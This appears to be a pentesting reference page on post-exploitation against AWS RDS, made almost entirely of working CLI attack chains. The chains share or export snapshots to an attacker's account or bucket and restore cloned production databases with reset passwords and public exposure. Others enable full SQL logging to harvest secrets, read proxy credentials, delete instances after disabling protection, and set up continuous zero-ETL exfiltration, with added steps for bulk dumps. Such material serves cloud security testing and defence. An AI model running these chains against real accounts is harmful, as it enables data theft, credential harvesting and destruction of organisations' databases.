AWS - RDS Post Exploitation


RDS

For more information check:

AWS - Relational Database (RDS) Enum

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

If an attacker has enough permissions, they could make a DB publicly accessible by creating a snapshot of it and then restoring a publicly accessible DB instance from that snapshot.

bash
aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
    --db-instance-identifier <db-id> \
    --db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
    --db-instance-identifier "new-db-not-malicious" \
    --db-snapshot-identifier <snapshotId> \
    --db-subnet-group-name <db subnet group> \
    --publicly-accessible \
    --vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
    --db-instance-identifier "new-db-not-malicious" \
    --master-user-password 'Llaody2f6.123' \
    --apply-immediately

# Connect to the new DB after a few mins

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

An attacker with these permissions could create a snapshot of a DB and make it publicly available. Then, they could simply create a DB from that snapshot in their own account.

If the attacker doesn't have rds:CreateDBSnapshot, they can still make other existing snapshots public.

bash
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
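
Then, from the attacker's account, the shared or public snapshot can be restored directly by its ARN (a sketch; region, account ID and names are placeholders, and encrypted snapshots additionally require access to the KMS key):

bash
# Run with the attacker's credentials
aws rds restore-db-instance-from-db-snapshot \
    --db-instance-identifier stolen-db \
    --db-snapshot-identifier arn:aws:rds:<region>:<victim-account-id>:snapshot:<snapshot-name> \
    --publicly-accessible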

rds:DownloadDBLogFilePortion

An attacker with the rds:DownloadDBLogFilePortion permission can download portions of an RDS instance's log files. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.

bash
aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
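
To retrieve every log file in full rather than a single portion, a small loop (a sketch, assuming the same instance name) can enumerate files with rds:DescribeDBLogFiles and pull each one:

bash
for f in $(aws rds describe-db-log-files \
    --db-instance-identifier target-instance \
    --query 'DescribeDBLogFiles[].LogFileName' --output text); do
  # --starting-token 0 makes the CLI paginate through the whole file
  aws rds download-db-log-file-portion \
    --db-instance-identifier target-instance \
    --log-file-name "$f" --starting-token 0 --output text > "${f##*/}"
done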

Potential Impact: Access to sensitive information or unauthorized actions using leaked credentials.

rds:DeleteDBInstance

An attacker with this permission can DoS existing RDS instances.

bash
# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
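
If the target has deletion protection enabled, delete-db-instance fails; with the additional rds:ModifyDBInstance permission an attacker could disable it first (sketch):

bash
aws rds modify-db-instance \
    --db-instance-identifier target-instance \
    --no-deletion-protection --apply-immediately
# Then retry the delete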

Potential impact: Deletion of existing RDS instances, and potential loss of data.

rds:StartExportTask

note

TODO: Test

An attacker with this permission can export an RDS instance snapshot to an S3 bucket. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.

bash
aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
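
For the export to work, the role in --iam-role-arn must trust export.rds.amazonaws.com and be allowed to write to the destination bucket; a minimal sketch of such a role (names are placeholders):

bash
cat > export-trust.json <<'JSON'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"Service": "export.rds.amazonaws.com"},
    "Action": "sts:AssumeRole"
  }]
}
JSON
aws iam create-role --role-name export-role \
  --assume-role-policy-document file://export-trust.json
# Attach a policy granting s3:PutObject / s3:ListBucket / s3:GetBucketLocation on attacker-bucket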

Potential impact: Access to sensitive data in the exported snapshot.

Cross-Region Automated Backups Replication for Stealthy Restore (rds:StartDBInstanceAutomatedBackupsReplication)

Abuse cross-Region automated backups replication to quietly duplicate an RDS instance's automated backups into another AWS Region and restore there. The attacker can then make the restored DB publicly accessible and reset the master password to access data out-of-band in a Region defenders might not monitor.

Permissions needed (minimum):

  • rds:StartDBInstanceAutomatedBackupsReplication in the destination Region
  • rds:DescribeDBInstanceAutomatedBackups in the destination Region
  • rds:RestoreDBInstanceToPointInTime in the destination Region
  • rds:ModifyDBInstance in the destination Region
  • rds:StopDBInstanceAutomatedBackupsReplication (optional cleanup)
  • ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress (to expose the restored DB)

Impact: Persistence and data exfiltration by restoring a copy of production data into another Region and exposing it publicly with attacker-controlled credentials.

End-to-end CLI (replace placeholders)
bash
# 1) Recon (SOURCE region A)
aws rds describe-db-instances \
  --region <SOURCE_REGION> \
  --query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,DBInstanceStatus,PreferredBackupWindow]' \
  --output table

# 2) Start cross-Region automated backups replication (run in DEST region B)
aws rds start-db-instance-automated-backups-replication \
  --region <DEST_REGION> \
  --source-db-instance-arn <SOURCE_DB_INSTANCE_ARN> \
  --source-region <SOURCE_REGION> \
  --backup-retention-period 7

# 3) Wait for replication to be ready in DEST
aws rds describe-db-instance-automated-backups \
  --region <DEST_REGION> \
  --query 'DBInstanceAutomatedBackups[*].[DBInstanceAutomatedBackupsArn,DBInstanceIdentifier,Status]' \
  --output table
# Proceed when Status is "replicating" or "active" and note the DBInstanceAutomatedBackupsArn
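
# (Sketch) Poll until the replicated automated backup is usable:
until [[ "$(aws rds describe-db-instance-automated-backups --region <DEST_REGION> \
  --query 'DBInstanceAutomatedBackups[0].Status' --output text)" =~ ^(replicating|active)$ ]]; do
  sleep 30
done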

# 4) Restore to latest restorable time in DEST
aws rds restore-db-instance-to-point-in-time \
  --region <DEST_REGION> \
  --source-db-instance-automated-backups-arn <AUTO_BACKUP_ARN> \
  --target-db-instance-identifier <TARGET_DB_ID> \
  --use-latest-restorable-time \
  --db-instance-class db.t3.micro
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>

# 5) Make public and reset credentials in DEST
# 5a) Create/choose an open SG permitting TCP/3306 (adjust engine/port as needed)
OPEN_SG_ID=$(aws ec2 create-security-group --region <DEST_REGION> \
  --group-name open-rds-<RAND> --description open --vpc-id <DEST_VPC_ID> \
  --query GroupId --output text)
aws ec2 authorize-security-group-ingress --region <DEST_REGION> \
  --group-id "$OPEN_SG_ID" \
  --ip-permissions IpProtocol=tcp,FromPort=3306,ToPort=3306,IpRanges='[{CidrIp=0.0.0.0/0}]'

# 5b) Publicly expose restored DB and attach the SG
aws rds modify-db-instance --region <DEST_REGION> \
  --db-instance-identifier <TARGET_DB_ID> \
  --publicly-accessible \
  --vpc-security-group-ids "$OPEN_SG_ID" \
  --apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>

# 5c) Reset the master password
aws rds modify-db-instance --region <DEST_REGION> \
  --db-instance-identifier <TARGET_DB_ID> \
  --master-user-password '<NEW_STRONG_PASSWORD>' \
  --apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>

# 6) Connect to <TARGET_DB_ID> endpoint and validate data (example for MySQL)
ENDPOINT=$(aws rds describe-db-instances --region <DEST_REGION> \
  --db-instance-identifier <TARGET_DB_ID> \
  --query 'DBInstances[0].Endpoint.Address' --output text)
mysql -h "$ENDPOINT" -u <MASTER_USERNAME> -p'<NEW_STRONG_PASSWORD>' -e 'SHOW DATABASES;'

# 7) Optional: stop replication
aws rds stop-db-instance-automated-backups-replication \
  --region <DEST_REGION> \
  --source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>

Enable full SQL logging via DB parameter groups and exfiltrate via RDS log APIs

Abuse rds:ModifyDBParameterGroup with RDS log download APIs to capture all SQL statements executed by applications (no DB engine credentials needed). Enable engine SQL logging and pull the file logs via rds:DescribeDBLogFiles and rds:DownloadDBLogFilePortion (or the REST downloadCompleteLogFile). Useful to collect queries that may contain secrets/PII/JWTs.

Permissions needed (minimum):

  • rds:DescribeDBInstances, rds:DescribeDBLogFiles, rds:DownloadDBLogFilePortion
  • rds:CreateDBParameterGroup, rds:ModifyDBParameterGroup
  • rds:ModifyDBInstance (only to attach a custom parameter group if the instance is using the default one)
  • rds:RebootDBInstance (for parameters requiring reboot, e.g., PostgreSQL)

Steps

  1. Recon target and current parameter group
bash
aws rds describe-db-instances \
  --query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBParameterGroups[0].DBParameterGroupName]' \
  --output table
  2. Ensure a custom DB parameter group is attached (cannot edit the default)
  • If the instance already uses a custom group, reuse its name in the next step.
  • Otherwise create and attach one matching the engine family:
bash
# Example for PostgreSQL 16
aws rds create-db-parameter-group \
  --db-parameter-group-name ht-logs-pg \
  --db-parameter-group-family postgres16 \
  --description "HT logging"

aws rds modify-db-instance \
  --db-instance-identifier <DB> \
  --db-parameter-group-name ht-logs-pg \
  --apply-immediately
# Wait until status becomes "available"
  3. Enable verbose SQL logging
  • MySQL engines (immediate / no reboot):
bash
aws rds modify-db-parameter-group \
  --db-parameter-group-name <PGNAME> \
  --parameters \
  "ParameterName=general_log,ParameterValue=1,ApplyMethod=immediate" \
  "ParameterName=log_output,ParameterValue=FILE,ApplyMethod=immediate"
# Optional extras:
#   "ParameterName=slow_query_log,ParameterValue=1,ApplyMethod=immediate" \
#   "ParameterName=long_query_time,ParameterValue=0,ApplyMethod=immediate"
  • PostgreSQL engines (reboot required):
bash
aws rds modify-db-parameter-group \
  --db-parameter-group-name <PGNAME> \
  --parameters \
  "ParameterName=log_statement,ParameterValue=all,ApplyMethod=pending-reboot"
# Optional to log duration for every statement:
#   "ParameterName=log_min_duration_statement,ParameterValue=0,ApplyMethod=pending-reboot"

# Reboot if any parameter is pending-reboot
aws rds reboot-db-instance --db-instance-identifier <DB>
  4. Let the workload run (or generate queries). Statements will be written to engine file logs
  • MySQL: general/mysql-general.log
  • PostgreSQL: postgresql.log
  5. Discover and download logs (no DB creds required)
bash
aws rds describe-db-log-files --db-instance-identifier <DB>

# Pull full file via portions (iterate until AdditionalDataPending=false). For small logs a single call is enough:
aws rds download-db-log-file-portion \
  --db-instance-identifier <DB> \
  --log-file-name general/mysql-general.log \
  --starting-token 0 \
  --output text > dump.log
  6. Analyze offline for sensitive data
bash
grep -Ei "password=|aws_access_key_id|secret|authorization:|bearer" dump.log | sed 's/\(aws_access_key_id=\)[A-Z0-9]*/\1AKIA.../; s/\(secret=\).*/\1REDACTED/; s/\(Bearer \).*/\1REDACTED/' | head

Example evidence (redacted):

text
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('user=alice password=Sup3rS3cret!')
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('authorization: Bearer REDACTED')
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('aws_access_key_id=AKIA... secret=REDACTED')

Cleanup

  • Revert parameters to defaults and reboot if required:
bash
# MySQL
aws rds modify-db-parameter-group \
  --db-parameter-group-name <PGNAME> \
  --parameters \
  "ParameterName=general_log,ParameterValue=0,ApplyMethod=immediate"

# PostgreSQL
aws rds modify-db-parameter-group \
  --db-parameter-group-name <PGNAME> \
  --parameters \
  "ParameterName=log_statement,ParameterValue=none,ApplyMethod=pending-reboot"
# Reboot if pending-reboot

Impact: Post-exploitation data access by capturing all application SQL statements via AWS APIs (no DB creds), potentially leaking secrets, JWTs, and PII.

rds:CreateDBInstanceReadReplica, rds:ModifyDBInstance

Abuse RDS read replicas to gain out-of-band read access without touching the primary instance credentials. An attacker can create a read replica from a production instance, reset the replica's master password (this does not change the primary), and optionally expose the replica publicly to exfiltrate data.

Permissions needed (minimum):

  • rds:DescribeDBInstances
  • rds:CreateDBInstanceReadReplica
  • rds:ModifyDBInstance
  • ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress (if exposing publicly)

Impact: Read-only access to production data via a replica with attacker-controlled credentials; lower detection likelihood as the primary remains untouched and replication continues.

bash
# 1) Recon: find non-Aurora sources with backups enabled
aws rds describe-db-instances \
  --query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBInstanceArn,DBSubnetGroup.DBSubnetGroupName,VpcSecurityGroups[0].VpcSecurityGroupId,PubliclyAccessible]' \
  --output table

# 2) Create a permissive SG (replace <VPC_ID> and <YOUR_IP/32>)
aws ec2 create-security-group --group-name rds-repl-exfil --description 'RDS replica exfil' --vpc-id <VPC_ID> --query GroupId --output text
aws ec2 authorize-security-group-ingress --group-id <SGID> --ip-permissions '[{"IpProtocol":"tcp","FromPort":3306,"ToPort":3306,"IpRanges":[{"CidrIp":"<YOUR_IP/32>","Description":"tester"}]}]'

# 3) Create the read replica (optionally public)
aws rds create-db-instance-read-replica \
  --db-instance-identifier <REPL_ID> \
  --source-db-instance-identifier <SOURCE_DB> \
  --db-instance-class db.t3.medium \
  --publicly-accessible \
  --vpc-security-group-ids <SGID>
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>

# 4) Reset ONLY the replica master password (primary unchanged)
aws rds modify-db-instance --db-instance-identifier <REPL_ID> --master-user-password 'NewStr0ng!Passw0rd' --apply-immediately
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>

# 5) Connect and dump (use the SOURCE master username + NEW password)
REPL_ENDPOINT=$(aws rds describe-db-instances --db-instance-identifier <REPL_ID> --query 'DBInstances[0].Endpoint.Address' --output text)
# e.g., with mysql client:  mysql -h "$REPL_ENDPOINT" -u <MASTER_USERNAME> -p'NewStr0ng!Passw0rd' -e 'SHOW DATABASES; SELECT @@read_only, CURRENT_USER();'

# Optional: promote for persistence
# aws rds promote-read-replica --db-instance-identifier <REPL_ID>
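
# (Sketch) Bulk exfiltration from the replica, e.g. with mysqldump:
# mysqldump -h "$REPL_ENDPOINT" -u <MASTER_USERNAME> -p'NewStr0ng!Passw0rd' \
#   --all-databases --single-transaction > loot.sql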

Example evidence (MySQL):

  • Replica DB status: available, read replication: replicating
  • Successful connection with new password and @@read_only=1 confirming read-only replica access.

rds:CreateBlueGreenDeployment, rds:ModifyDBInstance

Abuse RDS Blue/Green to clone a production DB into a continuously replicated, read‑only green environment. Then reset the green master credentials to access the data without touching the blue (prod) instance. This is stealthier than snapshot sharing and often bypasses monitoring focused only on the source.

bash
# 1) Recon – find eligible source (non‑Aurora MySQL/PostgreSQL in the same account)
aws rds describe-db-instances \
  --query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,EngineVersion,DBSubnetGroup.DBSubnetGroupName,PubliclyAccessible]'

# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), no RDS Proxy, supported engine/version

# 2) Create Blue/Green deployment (replicates blue->green continuously)
aws rds create-blue-green-deployment \
  --blue-green-deployment-name ht-bgd-attack \
  --source <BLUE_DB_ARN>
  # Optional upgrade: add --target-engine-version <same-or-higher-compatible>

# Wait until deployment Status becomes AVAILABLE, then note the green DB id
aws rds describe-blue-green-deployments \
  --blue-green-deployment-identifier <BGD_ID> \
  --query 'BlueGreenDeployments[0].SwitchoverDetails[0].TargetMember'

# Typical green id: <blue>-green-XXXX
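
# (Sketch) Poll until the deployment is AVAILABLE before touching the green DB:
until [[ "$(aws rds describe-blue-green-deployments \
  --blue-green-deployment-identifier <BGD_ID> \
  --query 'BlueGreenDeployments[0].Status' --output text)" == "AVAILABLE" ]]; do
  sleep 30
done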

# 3) Reset the green master password (does not affect blue)
aws rds modify-db-instance \
  --db-instance-identifier <GREEN_DB_ID> \
  --master-user-password 'Gr33n!Exfil#1' \
  --apply-immediately

# Optional: expose the green for direct access (attach an SG that allows the DB port)
aws rds modify-db-instance \
  --db-instance-identifier <GREEN_DB_ID> \
  --publicly-accessible \
  --vpc-security-group-ids <SG_ALLOWING_DB_PORT> \
  --apply-immediately

# 4) Connect to the green endpoint and query/exfiltrate (green is read‑only)
aws rds describe-db-instances \
  --db-instance-identifier <GREEN_DB_ID> \
  --query 'DBInstances[0].Endpoint.Address' --output text

# Then connect with the master username and the new password and run SELECT/dumps
# e.g. MySQL: mysql -h <endpoint> -u <master_user> -p'Gr33n!Exfil#1'

# 5) Cleanup – remove blue/green and the green resources
aws rds delete-blue-green-deployment \
  --blue-green-deployment-identifier <BGD_ID> \
  --delete-target

Impact: Read-only but full data access to a near-real-time clone of production without modifying the production instance. Useful for stealthy data extraction and offline analysis.

Out-of-band SQL via RDS Data API by enabling HTTP endpoint + resetting master password

Abuse Aurora to enable the RDS Data API HTTP endpoint on a target cluster, reset the master password to a value you control, and run SQL over HTTPS (no VPC network path required). Works on Aurora engines that support the Data API/EnableHttpEndpoint (e.g., Aurora MySQL 8.0 provisioned; some Aurora PostgreSQL/MySQL versions).

Permissions (minimum):

  • rds:DescribeDBClusters, rds:ModifyDBCluster (or rds:EnableHttpEndpoint)
  • secretsmanager:CreateSecret
  • rds-data:ExecuteStatement (and rds-data:BatchExecuteStatement if used)

Impact: Bypass network segmentation and exfiltrate data via AWS APIs without direct VPC connectivity to the DB.

End-to-end CLI (Aurora MySQL example)
bash
# 1) Identify target cluster ARN
REGION=us-east-1
CLUSTER_ID=<target-cluster-id>
CLUSTER_ARN=$(aws rds describe-db-clusters --region $REGION \
  --db-cluster-identifier $CLUSTER_ID \
  --query 'DBClusters[0].DBClusterArn' --output text)

# 2) Enable Data API HTTP endpoint on the cluster
# Either of the following (depending on API/engine support):
aws rds enable-http-endpoint --region $REGION --resource-arn "$CLUSTER_ARN"
# or
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --enable-http-endpoint --apply-immediately

# Wait until HttpEndpointEnabled is True
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --query 'DBClusters[0].HttpEndpointEnabled' --output text

# 3) Reset master password to attacker-controlled value
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --master-user-password 'Sup3rStr0ng!1' --apply-immediately
# Wait until pending password change is applied
while :; do
  aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
  P=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
     --query 'DBClusters[0].PendingModifiedValues.MasterUserPassword' --output text)
  [[ "$P" == "None" || "$P" == "null" ]] && break
  sleep 10
done

# 4) Create a Secrets Manager secret for Data API auth
SECRET_ARN=$(aws secretsmanager create-secret --region $REGION --name rdsdata/demo-$CLUSTER_ID \
  --secret-string '{"username":"admin","password":"Sup3rStr0ng!1"}' \
  --query ARN --output text)

# 5) Prove out-of-band SQL via HTTPS using rds-data
# (Example with Aurora MySQL; for PostgreSQL, adjust SQL and username accordingly)
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
  --secret-arn "$SECRET_ARN" --database mysql --sql "create database if not exists demo;"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
  --secret-arn "$SECRET_ARN" --database demo --sql "create table if not exists pii(note text);"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
  --secret-arn "$SECRET_ARN" --database demo --sql "insert into pii(note) values ('token=SECRET_JWT');"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
  --secret-arn "$SECRET_ARN" --database demo --sql "select current_user(), now(), (select count(*) from pii) as row_count;" \
  --format-records-as JSON

Notes:

  • If multi-statement SQL is rejected by rds-data, issue separate execute-statement calls.
  • For engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn.
  • Ensure the engine/version actually supports the Data API; otherwise HttpEndpointEnabled will remain False.
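
To pull victim data instead of the demo table, the same rds-data permissions allow enumerating and then dumping application tables (a sketch for Aurora MySQL; schema filters are an assumption):

bash
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
  --secret-arn "$SECRET_ARN" --database information_schema \
  --sql "select table_schema, table_name from tables where table_schema not in ('mysql','sys','information_schema','performance_schema');" \
  --format-records-as JSON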

Harvest DB credentials via RDS Proxy auth secrets (rds:DescribeDBProxies + secretsmanager:GetSecretValue)

Abuse RDS Proxy configuration to discover the Secrets Manager secret used for backend authentication, then read the secret to obtain database credentials. Many environments grant broad secretsmanager:GetSecretValue, making this a low-friction pivot to DB creds. If the secret uses a CMK, mis-scoped KMS permissions may also allow kms:Decrypt.

Permissions needed (minimum):

  • rds:DescribeDBProxies
  • secretsmanager:GetSecretValue on the referenced SecretArn
  • Optional when the secret uses a CMK: kms:Decrypt on that key

Impact: Immediate disclosure of DB username/password configured on the proxy; enables direct DB access or further lateral movement.

Steps

bash
# 1) Enumerate proxies and extract the SecretArn used for auth
aws rds describe-db-proxies \
  --query 'DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn]' \
  --output table

# 2) Read the secret value (common over-permission)
aws secretsmanager get-secret-value \
  --secret-id <SecretArnFromProxy> \
  --query SecretString --output text
# Example output: {"username":"admin","password":"S3cr3t!"}
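
With the recovered credentials, connecting through the proxy endpoint is direct (a sketch; requires network reachability to the proxy's VPC, and names are placeholders):

bash
PROXY_EP=$(aws rds describe-db-proxies --db-proxy-name <DBProxyName> \
  --query 'DBProxies[0].Endpoint' --output text)
mysql -h "$PROXY_EP" -u admin -p'S3cr3t!' -e 'SELECT CURRENT_USER();'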

Lab (minimal to reproduce)

bash
REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SECRET_ARN=$(aws secretsmanager create-secret \
  --region $REGION --name rds/proxy/aurora-demo \
  --secret-string '{"username":"admin","password":"S3cr3t!"}' \
  --query ARN --output text)
# Trust policy so RDS Proxy can assume the role and read the secret
cat > proxy-trust.json <<'JSON'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"Service": "rds.amazonaws.com"},
    "Action": "sts:AssumeRole"
  }]
}
JSON
aws iam create-role --role-name rds-proxy-secret-role \
  --assume-role-policy-document file://proxy-trust.json
aws iam attach-role-policy --role-name rds-proxy-secret-role \
  --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
  --auth "AuthScheme=SECRETS,SecretArn=$SECRET_ARN,IAMAuth=DISABLED" \
  --role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
  --vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true \
    --query 'Subnets[].SubnetId' --output text)
aws rds wait db-proxy-available --db-proxy-name p0
# Now run the enumeration + secret read from the Steps above

Cleanup (lab)

bash
aws rds delete-db-proxy --db-proxy-name p0
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery

Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration)

Abuse Aurora PostgreSQL zero‑ETL integration to continuously replicate production data into a Redshift Serverless namespace you control. With a permissive Redshift resource policy that authorizes CreateInboundIntegration/AuthorizeInboundIntegration for a specific Aurora cluster ARN, an attacker can establish a near‑real‑time data copy without DB creds, snapshots or network exposure.

Permissions needed (minimum):

  • rds:CreateIntegration, rds:DescribeIntegrations, rds:DeleteIntegration
  • redshift:PutResourcePolicy, redshift:DescribeInboundIntegrations, redshift:DescribeIntegrations
  • redshift-data:ExecuteStatement/GetStatementResult/ListDatabases (to query)
  • rds-data:ExecuteStatement (optional; to seed data if needed)

Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.

1) Create Redshift Serverless namespace + workgroup
bash
REGION=us-east-1
RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \
  --admin-username adminuser --admin-user-password 'AdminPwd-1!' \
  --query namespace.namespaceArn --output text)
RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \
  --namespace-name ztl-ns --base-capacity 8 --publicly-accessible \
  --query workgroup.workgroupArn --output text)
# Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL)
aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \
  --config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true
2) Configure Redshift resource policy to allow the Aurora source
bash
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SRC_ARN=<AURORA_CLUSTER_ARN>
cat > rs-rp.json <<JSON
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AuthorizeInboundByRedshiftService",
      "Effect": "Allow",
      "Principal": {"Service": "redshift.amazonaws.com"},
      "Action": "redshift:AuthorizeInboundIntegration",
      "Resource": "$RS_NS_ARN",
      "Condition": {"StringEquals": {"aws:SourceArn": "$SRC_ARN"}}
    },
    {
      "Sid": "AllowCreateInboundFromAccount",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::$ACCOUNT_ID:root"},
      "Action": "redshift:CreateInboundIntegration",
      "Resource": "$RS_NS_ARN"
    }
  ]
}
JSON
aws redshift put-resource-policy --region $REGION --resource-arn "$RS_NS_ARN" --policy file://rs-rp.json
3) Create Aurora PostgreSQL cluster (enable Data API and logical replication)
bash
CLUSTER_ID=aurora-ztl
aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --engine aurora-postgresql --engine-version 16.4 \
  --master-username postgres --master-user-password 'InitPwd-1!' \
  --enable-http-endpoint --no-deletion-protection --backup-retention-period 1
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
# Serverless v2 instance
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately
aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \
  --db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
# Cluster parameter group for zero‑ETL
aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \
  --db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params"
aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \
  ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
  ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
  ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \
  ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately
aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text)
4) Create the zero‑ETL integration from RDS
bash
# Include all tables in the default 'postgres' database
aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \
  --target-arn "$RS_NS_ARN" --integration-name ztl-demo \
  --data-filter 'include: postgres.*.*'
# Redshift inbound integration should become ACTIVE
aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN"
5) Materialize and query replicated data in Redshift
bash
# Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION)
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
  --sql "select integration_id from svv_integration"  # take the GUID value
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
  --sql "create database ztl_db from integration '<integration_id>' database postgres"
# List tables replicated
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \
  --sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;"

Evidence observed in test:

  • redshift describe-inbound-integrations: Status ACTIVE for Integration arn:...377a462b-...
  • SVV_INTEGRATION showed integration_id 377a462b-c42c-4f08-937b-77fe75d98211 and state PendingDbConnectState prior to DB creation.
  • After CREATE DATABASE FROM INTEGRATION, listing tables revealed schema ztl and table customers; selecting from ztl.customers returned 2 rows (Alice, Bob).

Impact: Continuous near‑real‑time exfiltration of selected Aurora PostgreSQL tables into Redshift Serverless controlled by the attacker, without using database credentials, backups, or network access to the source cluster.
